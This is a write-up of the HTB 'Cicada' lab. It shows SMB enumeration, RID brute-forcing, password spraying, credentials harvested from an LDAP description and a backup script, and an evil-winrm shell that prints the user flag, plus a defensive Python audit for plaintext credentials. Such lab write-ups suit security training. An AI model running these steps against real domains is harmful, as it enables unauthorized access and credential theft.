Overview
The machine starts with SMB guest access that exposes an HR share containing a default onboarding password. RID brute-forcing enumerates the domain users, and spraying that default password against them gives us initial credentials for michael.wrightson. LDAP enumeration with that account leaks david.orelious's password from his description attribute, which gives read access to the DEV share, where a backup script exposes emily.oscars's credentials and gets us a WinRM shell. Emily is a member of Backup Operators and holds SeBackupPrivilege, so we dump the SAM and SYSTEM hives, extract the Administrator NTLM hash and get a shell as Administrator via Pass-the-Hash.
Enumeration
We'll start with an nmap scan, as usual.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.231.149 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-05 03:31 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:31
Completed Parallel DNS resolution of 1 host. at 03:31, 0.11s elapsed
Initiating Connect Scan at 03:31
Scanning 10.129.231.149 [1000 ports]
Discovered open port 53/tcp on 10.129.231.149
Discovered open port 135/tcp on 10.129.231.149
Discovered open port 445/tcp on 10.129.231.149
Discovered open port 139/tcp on 10.129.231.149
Discovered open port 464/tcp on 10.129.231.149
Discovered open port 593/tcp on 10.129.231.149
Discovered open port 636/tcp on 10.129.231.149
Discovered open port 3269/tcp on 10.129.231.149
Discovered open port 3268/tcp on 10.129.231.149
Discovered open port 389/tcp on 10.129.231.149
Discovered open port 88/tcp on 10.129.231.149
Completed Connect Scan at 03:32, 11.72s elapsed (1000 total ports)
Initiating Service scan at 03:32
Scanning 11 services on 10.129.231.149
Completed Service scan at 03:32, 48.12s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.231.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:32
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.93% done; ETC: 03:33 (0:00:00 remaining)
Completed NSE at 03:33, 40.09s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 2.97s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
Nmap scan report for 10.129.231.149
Host is up, received user-set (0.13s latency).
Scanned at 2026-06-05 03:31:53 PDT for 103s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-05 17:32:11Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-05T17:33:36+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
| _ssl-date: 2026-06-05T17:33:34+00:00; +7h00m00s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-05T17:33:36+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-05T17:33:34+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-06-05T17:32:57
| _ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 57184/tcp): CLEAN (Timeout)
| Check 2 (port 12292/tcp): CLEAN (Timeout)
| Check 3 (port 19380/udp): CLEAN (Timeout)
| Check 4 (port 51274/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| _clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.45 seconds
We've got DNS, SMB, NetBIOS, LDAP, LDAPS and Kerberos, so we're sure it is an AD environment:
- the domain name is cicada.htb and the FQDN is CICADA-DC.cicada.htb, so we need to add those to our hosts file
- there is ADCS in place with the CA CICADA-DC-CA
- there is a big time skew of 7 hours, so we need to sync our clock
Let's set up the environment.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ echo '10.129.231.149 CICADA-DC CICADA-DC.cicada.htb cicada.htb' | sudo tee -a /etc/hosts
10.129.231.149 CICADA-DC CICADA-DC.cicada.htb cicada.htb
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] krb5 conf saved to: krb5.conf
SMB 10.129.231.149 445 CICADA-DC [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ sudo ntpdate cicada.htb
2026-06-05 10:39:58.768614 (-0700) +25200.136446 +/- 0.037808 cicada.htb 10.129.231.149 s1 no-leap
CLOCK: time stepped by 25200.136446
We're not given any credentials, so let's test whether the Guest account is enabled, and if it is, we'll try to find a readable share.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'Guest' -p ''
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'Guest' -p '' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server share
HR Share
We found a file called Notice from HR.txt, so let's download it.
One issue with smbclient is that we can't wrap the file name in single quotes to escape the spaces, so the solution I always use is to download all the files, as you can see.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ smbclient //cicada.htb/HR -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 05:29:09 2024
.. D 0 Thu Mar 14 05:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 10:31:48 2024
4168447 blocks of size 4096. 459490 blocks available
smb: \> get Notice from HR.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Notice
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \>
As you can see, it looks like an onboarding notice containing the default password Cicada$M6Corpb*@Lp#nZp!8.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
So let's get a list of users. We can try --users and --rid-brute, and if those don't work we'll look for an LDAP null bind to enumerate users, but --rid-brute worked here.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'Guest' -p '' --rid-brute
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.129.231.149 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
Here is our user list:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ cat rid.txt | grep User | cut -d "\\" -f 2 | grep -v Group | sed 's/ .*//g' > users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
User Michael
At this point we have a list of users and a possible password for one of them, so let's password spray the list.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Trying to list shares as this user, there is still no read access on the DEV share.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
So I tested the user against LDAP and it worked, so as always I ran my ldaphunt to find any passwords or information leaked in LDAP attributes.
In real pentests you will always run this kind of scan, and also on HTB machines, especially the easy ones.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) (signing:None) (channel binding:Never)
LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
User David
Looking at this data, I found that the user david.orelious leaked his password in his description attribute.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) (signing:None) (channel binding:Never)
LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.129.231.149 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.129.231.149 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.231.149 389 CICADA-DC Administrator 2024-08-26 13:08:03 2 Built-in account for administering the computer/domain
LDAP 10.129.231.149 389 CICADA-DC Guest 2024-08-28 10:26:56 0 Built-in account for guest access to the computer/domain
LDAP 10.129.231.149 389 CICADA-DC krbtgt 2024-03-14 04:14:10 2 Key Distribution Center Service Account
LDAP 10.129.231.149 389 CICADA-DC john.smoulder 2024-03-14 05:17:29 2
LDAP 10.129.231.149 389 CICADA-DC sarah.dantelia 2024-03-14 05:17:29 2
LDAP 10.129.231.149 389 CICADA-DC michael.wrightson 2024-03-14 05:17:29 0
LDAP 10.129.231.149 389 CICADA-DC david.orelious 2024-03-14 05:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP 10.129.231.149 389 CICADA-DC emily.oscars 2024-08-22 14:20:17 1
We got read access on the DEV share with david's account, so let's see what we can find.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV READ
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
Dev Share
There is a backup PowerShell script that uses the credentials of a user called emily to back up files.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ smbclient //cicada.htb/DEV -U'david.orelious'%'aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 05:31:39 2024
.. D 0 Thu Mar 14 05:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 10:28:22 2024
4168447 blocks of size 4096. 478048 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
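Both leaks above, the password in david.orelious's description attribute and the literal credential in Backup_script.ps1, are exactly what an internal audit should catch before anyone else does. The following Python is an added example, not part of the original write-up: it parses the nxc ldap --users table shown earlier and scans a PowerShell file for the ConvertTo-SecureString -AsPlainText idiom, using constructed input that mirrors this page; the secret-shape heuristic and the script path are assumptions.

```python
"""Audit for plaintext credentials in two places this box leaked them:
LDAP description attributes and a script left on a file share.
Sample input is constructed to mirror the page; the heuristics are assumptions."""
import re
from dataclasses import dataclass

# Constructed sample: the table printed by `nxc ldap --users` (abridged)
NXC_LDAP_USERS = """\
LDAP 10.129.231.149 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.129.231.149 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.231.149 389 CICADA-DC Administrator 2024-08-26 13:08:03 2 Built-in account for administering the computer/domain
LDAP 10.129.231.149 389 CICADA-DC krbtgt 2024-03-14 04:14:10 2 Key Distribution Center Service Account
LDAP 10.129.231.149 389 CICADA-DC michael.wrightson 2024-03-14 05:17:29 0
LDAP 10.129.231.149 389 CICADA-DC david.orelious 2024-03-14 05:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
"""

# Constructed sample: the credential-bearing lines of Backup_script.ps1 from the DEV share
BACKUP_SCRIPT = r'''$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
'''

# One table row: tool prefix, username, "Last PW Set" timestamp, BadPW count, free-text description
ROW = re.compile(r"^LDAP\s+\S+\s+\d+\s+\S+\s+(\S+)\s+\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\s+\d+\s*(.*)$")
PASSWORD_WORD = re.compile(r"\b(?:password|passwd|pwd|pass)\b", re.I)
# PowerShell idiom that turns a string literal into a credential object
PS_PLAINTEXT = re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)


@dataclass
class Finding:
    source: str   # "ldap:<user>" or "<path>:<line>"
    secret: str   # candidate credential; print only the redacted form
    reason: str

    def redacted(self) -> str:
        return self.secret[:2] + "*" * max(len(self.secret) - 2, 0)


def looks_like_secret(token: str) -> bool:
    """Password-shaped: 8+ chars, contains a digit, and 3+ character classes.
    The digit requirement keeps ordinary words such as 'Built-in' out."""
    if len(token) < 8 or not any(c.isdigit() for c in token):
        return False
    classes = (any(c.islower() for c in token), any(c.isupper() for c in token),
               any(c.isdigit() for c in token), any(not c.isalnum() for c in token))
    return sum(classes) >= 3


def audit_ldap_descriptions(output: str) -> list[Finding]:
    """Flag descriptions that carry a password-shaped token or talk about a password."""
    findings = []
    for line in output.splitlines():
        m = ROW.match(line)
        if not m or not m.group(2):          # header lines and empty descriptions
            continue
        user, description = m.groups()
        tokens = [t for t in description.split() if looks_like_secret(t)]
        if tokens:
            findings.append(Finding(f"ldap:{user}", tokens[0], "password-shaped token in description"))
        elif PASSWORD_WORD.search(description):
            findings.append(Finding(f"ldap:{user}", "", "description mentions a password"))
    return findings


def audit_script(path: str, text: str) -> list[Finding]:
    """Flag PowerShell that builds a SecureString from a literal in the source."""
    return [Finding(f"{path}:{n}", m.group(1), "ConvertTo-SecureString -AsPlainText on a literal")
            for n, line in enumerate(text.splitlines(), start=1)
            if (m := PS_PLAINTEXT.search(line))]


if __name__ == "__main__":
    for f in audit_ldap_descriptions(NXC_LDAP_USERS) + audit_script("DEV/Backup_script.ps1", BACKUP_SCRIPT):
        print(f"{f.source}: {f.reason} [{f.redacted()}]")
```

A safer pattern for the backup job is a scheduled task running as a group Managed Service Account, or at minimum a credential stored with Export-Clixml, which DPAPI binds to the user and machine that created it.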
Shell as Emily
With emily's credentials we get a WinRM shell and the user flag.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ../Desktop/user.txt
76cdfd025b88fa3913072d957d4b81ca
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Looking at this user's groups and privileges, we can see that she holds SeBackupPrivilege and is a member of the Backup Operators group.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
